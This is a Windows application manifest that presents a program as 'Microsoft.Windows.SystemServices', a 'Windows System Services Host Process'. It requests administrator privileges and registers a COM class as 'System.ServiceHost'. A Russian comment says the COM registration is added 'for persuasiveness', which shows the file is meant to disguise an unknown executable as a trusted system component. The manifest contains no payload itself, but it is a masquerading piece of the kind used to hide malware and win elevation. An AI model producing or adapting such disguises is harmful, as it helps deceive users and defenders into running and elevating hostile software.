<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity
    type="win32"
    name="Microsoft.Windows.SystemServices"
    version="6.1.0.0"
    processorArchitecture="amd64"
  />
  
  <description>Windows System Services Host Process</description>
  
  <!-- Запрос прав администратора (единственный trustInfo - дубликат убран) -->
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
      </requestedPrivileges>
    </security>
  </trustInfo>
  
  <!-- Совместимость с Windows -->
  <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
    <application>
      <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> <!-- Windows 10/11 -->
      <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!-- Windows 8.1 -->
      <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!-- Windows 8 -->
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!-- Windows 7 -->
    </application>
  </compatibility>
  
  <!-- Windows Common Controls -->
  <dependency>
    <dependentAssembly>
      <assemblyIdentity
        type="win32"
        name="Microsoft.Windows.Common-Controls"
        version="6.0.0.0"
        processorArchitecture="*"
        publicKeyToken="6595b64144ccf1df"
        language="*"
      />
    </dependentAssembly>
  </dependency>

  <!-- Регистрация COM-объектов (для убедительности) -->
  <comClass
    clsid="{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
    threadingModel="Apartment"
    progid="System.ServiceHost"
    description="Windows Service Host"
  />
  
  <!-- Интерфейсы -->
  <typelib
    tlbid="{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
    version="1.0"
    helpdir=""
    flags="hasdiskimage"
  />
  
  <!-- Активация Windows Features -->
  <asmv3:windowsSettings xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
    <dpiAware>true</dpiAware>
    <longPathAware>true</longPathAware>
    <heapType>SegmentHeap</heapType>
  </asmv3:windowsSettings>
  
  <application xmlns="urn:schemas-microsoft-com:asm.v3">
    <windowsSettings>
      <activeCodePage xmlns="http://schemas.microsoft.com/SMI/2019/WindowsSettings">UTF-8</activeCodePage>
    </windowsSettings>
  </application>
  
</assembly>